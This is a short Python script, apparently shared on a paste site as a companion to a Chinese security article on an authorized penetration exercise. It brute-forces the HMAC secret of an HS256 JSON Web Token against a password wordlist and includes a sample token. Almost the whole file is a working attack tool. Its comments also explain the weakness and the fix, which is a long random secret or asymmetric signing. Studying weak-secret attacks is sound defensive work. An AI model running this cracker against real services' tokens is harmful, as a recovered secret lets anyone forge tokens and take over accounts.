yangyangwithgnu

crack JWT

Aug 21st, 2019
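import jwt
import termcolor

# Companion script to the article "Obstructed All the Way: Notes on an
# Authorized Network Attack-and-Defense Exercise (Part 1)",
# https://www.freebuf.com/vuls/211842.html, more http://yangyangwithgnu.github.io/
#
# Checks whether the HMAC secret that signed `jwt_str` appears in a wordlist.
# A hit means the issuer signed tokens with a guessable secret, so anyone
# holding one token can recover it offline and mint tokens of their own.
# The fix on the issuing side is a randomly generated secret at least as long
# as the hash output (256 bits for HS256, per RFC 7518 section 3.2), or an
# asymmetric algorithm so that verifiers never hold the signing key.

# Sample token from the article; its header declares alg=HS256.
jwt_str = R'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoibmFuYSIsImFjdGlvbiI6InVwbG9hZCJ9.56wwCrB9tIgmUnYpLPxkO8GYj1soCjuu_skTlbH_Gg8'

with open('/your/wordlist/passwd/top10000.txt') as f:
    for line in f:
        key_ = line.strip()
        try:
            # `algorithms` is pinned to the algorithm named in the token header:
            # PyJWT 2.x refuses to verify without it, and pinning it is the
            # recommended way to call decode() in any version. Signature
            # verification is PyJWT's default, so the old `verify=True`
            # keyword (deprecated in 2.x) is not needed.
            jwt.decode(jwt_str, key=key_, algorithms=['HS256'])
        except jwt.exceptions.InvalidSignatureError:
            # Wrong candidate: overwrite the progress line and keep going.
            print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
            continue
        except (
            jwt.exceptions.ExpiredSignatureError,
            jwt.exceptions.InvalidAudienceError,
            jwt.exceptions.InvalidIssuedAtError,
            jwt.exceptions.ImmatureSignatureError,
        ):
            # PyJWT checks the signature before the registered claims, so a
            # claim failure (exp/aud/iat/nbf) still means the key matched.
            pass
        print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
        break
    else:
        # for/else: runs only when the wordlist was exhausted without a match.
        print('\r', '\bsorry! no key be found.')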